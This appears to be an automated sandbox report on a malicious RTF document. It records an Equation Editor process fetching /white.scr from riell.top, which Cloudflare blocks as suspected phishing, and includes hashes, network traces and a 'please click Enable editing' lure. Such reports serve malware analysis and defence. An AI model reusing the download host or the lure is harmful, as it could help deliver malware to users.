      SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:Unicode text, UTF-16, little-endian text, with no line terminators
      Category:dropped
      Size (bytes):2
      Entropy (8bit):1.0
      Encrypted:false
      SSDEEP:3:Qn:Qn
      MD5:F3B25701FE362EC84616A93A45CE9998
      SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
      SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
      SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
      Malicious:false
      Preview:..
      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      File Type:HTML document, ASCII text, with very long lines (394)
      Category:dropped
      Size (bytes):4403
      Entropy (8bit):5.082514093739441
      Encrypted:false
      SSDEEP:96:1j9jwIjYjUDK/D5DMF+BOisR+A2ZLimurR49PaQxJbGD:1j9jhjYjIK/Vo+tsR6ZOmurO9ieJGD
      MD5:7210BEAC6B5B7EE7B5D1852C7526B88D
      SHA1:B4A03626A96996998425F7EF1BDA42A2590D7CB9
      SHA-256:5D2536B30D14B47F95683ADC66FEC65837B753294D7ADC167B79792CC752A3F9
      SHA-512:45FE3F840EB42DA4CB13CE28BDD16C782E13974276BBD7106A70D6CD6DBB69EE7336F48E009487078B5721FFEBFBE678A9AD925734F6B3E3D35FA0CB7776201C
      Malicious:true
      Yara Hits:
      • Rule: JoeSecurity_BlockedWebSite, Description: Yara detected BlockedWebSite, Source: C:\Users\user\AppData\Roaming\white72911.scr, Author: Joe Security
      Preview:<!DOCTYPE html>. [if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->. [if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->. [if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->. [if gt IE 8]> > <html class="no-js" lang="en-US"> <![endif]-->.<head>.<title>Suspected phishing site | Cloudflare</title>.<meta charset="UTF-8" />.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge" />.<meta name="robots" content="noindex, nofollow" />.<meta name="viewport" content="width=device-width,initial-scale=1" />.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />. [if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]-->.<style>body{margin:0;padding:0}</style>... [if gte IE 10]> >.<script>. if (!navigator.cookieEnabled) {. window.addEventListener('DOMContentLoaded
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):162
      Entropy (8bit):2.4797606462020307
      Encrypted:false
      SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
      MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
      SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
      SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
      SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
      Malicious:false
      Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
      File type:Rich Text Format data, version 1
      Entropy (8bit):3.720625810181542
      TrID:
      • Rich Text Format (5005/1) 55.56%
      • Rich Text Format (4004/1) 44.44%
      File name:xJvN1QBl91.rtf
      File size:313'441 bytes
      MD5:de3ba4db4f0cf4d3b92ad9429de7545e
      SHA1:5b6eb61b2905c89698e5468a9a3dc468680b2d8e
      SHA256:fbd4bb68ae72c7715dcf61c915bdbc48d4d60eb9cd6bae30d74aad3e796663c7
      SHA512:5472327e63a71be86783ca346c95439949a00e11cd4c66c4d3416edd9f89cb50c3186423b8567de8b0c9930b1503774873b99ac3a2dfbacb2257f32322029760
      SSDEEP:6144:WGuqGuqGuqGuqGuqGuqGuqGuqGuqGuanyouQ0hTEb:sF
      TLSH:E764D26DD34B02598F620337AB571E5142BDBA7EF38552B1306C537933EAC38A22527E
      File Content Preview:{\rtf1..{\*\x2lLJQTtuAyU0VIfHSHR1JsWPSfjIVckxd51L670P4vbmmgsanXwjZrH8Mk6TDp51MHJok3V2tNRfxcgK4CVVus7rVL7tPrDtrO7yYnmYINtxCdVHxH1cSVRMYVjrEFZNoSL7euFkuxrvdGjE7oQMOEeQAFnepUYEpUtWCuKOP9GqS1nxBqb1qcBqydGXO9YGcWgUMJO}..{\311184163please click Enable editing f
      Icon Hash:2764a3aaaeb7bdbf
      IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
      000016F4Chno
      TimestampSource PortDest PortSource IPDest IP
      Jul 5, 2024 07:22:30.430520058 CEST49163443192.168.2.22188.114.96.3
      Jul 5, 2024 07:22:30.430557966 CEST44349163188.114.96.3192.168.2.22
      Jul 5, 2024 07:22:30.430619955 CEST49163443192.168.2.22188.114.96.3
      Jul 5, 2024 07:22:30.439004898 CEST49163443192.168.2.22188.114.96.3
      Jul 5, 2024 07:22:30.439016104 CEST44349163188.114.96.3192.168.2.22
      Jul 5, 2024 07:22:30.934483051 CEST44349163188.114.96.3192.168.2.22
      Jul 5, 2024 07:22:30.934560061 CEST49163443192.168.2.22188.114.96.3
      Jul 5, 2024 07:22:30.939009905 CEST49163443192.168.2.22188.114.96.3
      Jul 5, 2024 07:22:30.939017057 CEST44349163188.114.96.3192.168.2.22
      Jul 5, 2024 07:22:30.939264059 CEST44349163188.114.96.3192.168.2.22
      Jul 5, 2024 07:22:30.939312935 CEST49163443192.168.2.22188.114.96.3
      Jul 5, 2024 07:22:31.003643990 CEST49163443192.168.2.22188.114.96.3
      Jul 5, 2024 07:22:31.044507027 CEST44349163188.114.96.3192.168.2.22
      Jul 5, 2024 07:22:31.104978085 CEST44349163188.114.96.3192.168.2.22
      Jul 5, 2024 07:22:31.105040073 CEST44349163188.114.96.3192.168.2.22
      Jul 5, 2024 07:22:31.105048895 CEST49163443192.168.2.22188.114.96.3
      Jul 5, 2024 07:22:31.105063915 CEST44349163188.114.96.3192.168.2.22
      Jul 5, 2024 07:22:31.105082035 CEST49163443192.168.2.22188.114.96.3
      Jul 5, 2024 07:22:31.105106115 CEST49163443192.168.2.22188.114.96.3
      Jul 5, 2024 07:22:31.109231949 CEST44349163188.114.96.3192.168.2.22
      Jul 5, 2024 07:22:31.109280109 CEST49163443192.168.2.22188.114.96.3
      Jul 5, 2024 07:22:31.109286070 CEST44349163188.114.96.3192.168.2.22
      Jul 5, 2024 07:22:31.109322071 CEST49163443192.168.2.22188.114.96.3
      Jul 5, 2024 07:22:31.109328032 CEST44349163188.114.96.3192.168.2.22
      Jul 5, 2024 07:22:31.109337091 CEST44349163188.114.96.3192.168.2.22
      Jul 5, 2024 07:22:31.109364986 CEST49163443192.168.2.22188.114.96.3
      Jul 5, 2024 07:22:31.109380007 CEST49163443192.168.2.22188.114.96.3
      Jul 5, 2024 07:22:31.109920979 CEST49163443192.168.2.22188.114.96.3
      Jul 5, 2024 07:22:31.109931946 CEST44349163188.114.96.3192.168.2.22
      TimestampSource PortDest PortSource IPDest IP
      Jul 5, 2024 07:22:30.409421921 CEST5456253192.168.2.228.8.8.8
      Jul 5, 2024 07:22:30.419230938 CEST53545628.8.8.8192.168.2.22
      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
      Jul 5, 2024 07:22:30.409421921 CEST192.168.2.228.8.8.80x36d9Standard query (0)riell.topA (IP address)IN (0x0001)false
      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
      Jul 5, 2024 07:22:30.419230938 CEST8.8.8.8192.168.2.220x36d9No error (0)riell.top188.114.96.3A (IP address)IN (0x0001)false
      Jul 5, 2024 07:22:30.419230938 CEST8.8.8.8192.168.2.220x36d9No error (0)riell.top188.114.97.3A (IP address)IN (0x0001)false
      • riell.top
      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      0192.168.2.2249163188.114.96.34431272C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      TimestampBytes transferredDirectionData
      2024-07-05 05:22:30 UTC305OUTGET /white.scr HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: riell.top
      Connection: Keep-Alive
      2024-07-05 05:22:31 UTC638INHTTP/1.1 200 OK
      Date: Fri, 05 Jul 2024 05:22:31 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      X-Frame-Options: SAMEORIGIN
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m0Ju9DkjtBf1GxkCasv9w7FgBzO6BrKPOq4df1YUHXqiYnUUunSnDKddDrCjwrcO%2F9IXocNL%2B%2Bn5zVMJx7M5dLbiSHHUVGlBPm4wIZ1cZ4Lp4jlSwlcIB7FI4LE%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Strict-Transport-Security: max-age=0; includeSubDomains; preload
      X-Content-Type-Options: nosniff
      Server: cloudflare
      CF-RAY: 89e4eaf01f28431b-EWR
      2024-07-05 05:22:31 UTC731INData Raw: 31 31 33 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
      Data Ascii: 1133<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
      2024-07-05 05:22:31 UTC1369INData Raw: 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66 5f 73 74 79 6c 65 73 2d 69 65 2d 63 73 73 27 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e
      Data Ascii: />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListen
      2024-07-05 05:22:31 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 35 46 50 6f 54 46 43 70 72 75 78 4e 35 53 35 6d 55 7a 4c 42 63 71 4d 35 5a 75 77 35 70 71 76 36 62 34 72 79 66 45 35 78 31 7a 73 2d 31 37 32 30 31 35 36 39 35 31 2d 30 2e 30 2e 31 2e 31 2d 2f 77 68 69 74 65 2e 73 63 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72
      Data Ascii: <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="5FPoTFCpruxN5S5mUzLBcqM5Zuw5pqv6b4ryfE5x1zs-1720156951-0.0.1.1-/white.scr"> <a hr
      2024-07-05 05:22:31 UTC942INData Raw: 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66
      Data Ascii: class="hidden" id="cf-footer-ip">8.46.123.33</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href
      2024-07-05 05:22:31 UTC5INData Raw: 30 0d 0a 0d 0a
      Data Ascii: 0


      Click to jump to process

      Click to jump to process

      Click to dive into process behavior distribution

      Click to jump to process

      Target ID:0
      Start time:01:22:26
      Start date:05/07/2024
      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
      Imagebase:0x13f620000
      File size:1'423'704 bytes
      MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:false

      Target ID:2
      Start time:01:22:27
      Start date:05/07/2024
      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      Wow64 process (32bit):true
      Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      Imagebase:0x400000
      File size:543'304 bytes
      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:5
      Start time:01:22:47
      Start date:05/07/2024
      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      Wow64 process (32bit):true
      Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      Imagebase:0x400000
      File size:543'304 bytes
      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:false

      Reset < >
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.346288953.00000000008DF000.00000004.00000020.00020000.00000000.sdmp, Offset: 008DF000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_8df000_EQNEDT32.jbxd
        Similarity
        • API ID:
        • String ID: 3MT
        • API String ID: 0-4038927998
        • Opcode ID: 5b6cc1636e21525b2da73897583ba24fd87fbab90fed45ad6e568a97b9558eda
        • Instruction ID: 4788daba7dd732bfde7d021e92ee6e53d9451749819233daa2aaea6a2c84ab14
        • Opcode Fuzzy Hash: 5b6cc1636e21525b2da73897583ba24fd87fbab90fed45ad6e568a97b9558eda
        • Instruction Fuzzy Hash: 86C1CD0108EBC49FC3138B798965A917FB0AF17645B4E49DBC0C5CF2B3EA29580ED766